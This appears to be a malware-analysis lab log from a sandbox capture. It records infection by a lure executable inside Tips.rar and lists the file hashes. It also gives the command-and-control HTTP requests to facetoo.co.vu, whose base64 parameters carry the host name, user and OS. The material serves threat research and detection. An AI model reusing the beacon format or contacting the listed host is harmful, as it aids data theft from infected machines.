Timeline

• Probable Name: Unknown
• Infected by opening a rar file called Tips.rar and then extracting an exe file called "The Truth About Your Sexual Peak , Don't worry.exe"
• Exe file MD5: f589827c4cf94662544066b80bfda6ab The Truth About Your Sexual Peak , Don't worry.exe
• Exe file SHA1: 7351ae5ad8856ff3f6721c79799a50bcc73340af
  
• Exe file SHA256: f10909905711d915be97bb0fae6b08fa19881f02e0c1eea4b00ad0b7a988861b
  
• Other md5: d06a43032b1544a84e9171aac1469236 Tips.rar
• VirusTotal
• Hybrid-Analysis
• This is the same binary as capture CTU-132-1

Tue Sep 8 09:45:37 CEST 2015

Start win4

Tue Sep 8 09:50:54 CEST 2015

Executed Tips.rar, open the container and double click in the exe file.

There was also a fake error and then start working like the Details.zip file of previous capture.

URLs Requested

GET /index.php HTTP/1.1 Host: facetoo.co.vu

GET /IOS.php?Pn=V0lONCB8IEFkbWluaXN0cmF0b3I&fr=&GR=RmFjZUJvb2soSU9TKTxicj4gMjAxNS0wOC0yNA&com=IDxicj4gIDxicj4g&ID=12418116422684110102619421320747612712095&o=TWljcm9zb2Z0IFdpbmRvd3MgNyBVbHRpbWF0ZSA&ho=ZmFjZXRvby5jby52dQ==&av=&v=501P HTTP/1.1 User-Agent: 12418116422684110102619421320747612712095 Host: facetoo.co.vu

Base64decode of some parts of the URL

• V0lONCB8IEFkbWluaXN0cmF0b3I
  • WIN4 | Administrator
• RmFjZUJvb2soSU9TKTxicj4gMjAxNS0wOC0yNA
  • FaceBook(IOS)
    2015-08-24
• IDxicj4gIDxicj4g
  • 
    
    
• TWljcm9zb2Z0IFdpbmRvd3MgNyBVbHRpbWF0ZSA
  • Microsoft Windows 7 Ultimate
• ZmFjZXRvby5jby52dQ==
  • facetoo.co.vu

Thu Sep 10 14:24:47 CEST 2015

poweroff